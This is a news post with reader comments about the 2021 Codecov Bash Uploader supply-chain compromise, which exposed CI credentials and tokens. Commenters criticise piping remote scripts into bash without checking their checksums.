Codecov Bash Uploader Compromised In Supply Chain Hack (securityweek.com) 9
wiredmikey shares a report from SecurityWeek: Security response professionals are scrambling to measure the fallout from a software supply chain compromise of Codecov Bash Uploader that went undetected since January and exposed sensitive secrets like tokens, keys and credentials from organizations around the world. The hack occurred four months ago but was only discovered in the wild by a Codecov customer on the morning of April 1, 2021, the company said. Codecov is considered the vendor of choice for measuring code coverage in the tech industry. The company's tools help developers understand and measure lines of codes executed by a test suite and is widely deployed in big tech development pipelines. The company claims that more than 29,000 enterprises use its code coverage insights to check code quality and maintain code coverage. Codecov did not say how many customers were impacted or had data stolen in the incident.
According to Codecov, the altered version of the Bash Uploader script could potentially affect:
- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
According to Codecov, the altered version of the Bash Uploader script could potentially affect:
- Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
- Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
- The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
29,000 customers and they are to busy (Score:2)
Verification (Score:5, Insightful)
Geez. They do, apparently, publish SHA sums [codecov.io] for the script, but I guess nobody bothers using them.
Piping a URL you don't control directly into bash... what could possibly go wrong?
Re: (Score:2)
Re: Verification (Score:3)
For that matter, piping a URL you "control" directly into bash isn't a great idea either. Partly because what that really means is a "a URL you directly controlled three months ago, and are unaware that a Trojan was added 87 days ago".
Re: (Score:2)
We had to look at this a couple of days ago. I was horrified to discover that the default codecov integration for circleci involves this method.
Only 8 comments? (Score:2)
Guys this is hugely bad news right? It means that projects using this code coverage tool are also compromised... And apps built since then and uploaded to "secure" platforms such as Google Play Store or Apple Store may now be ridden with malware too.
We will definitely hear from this again soon.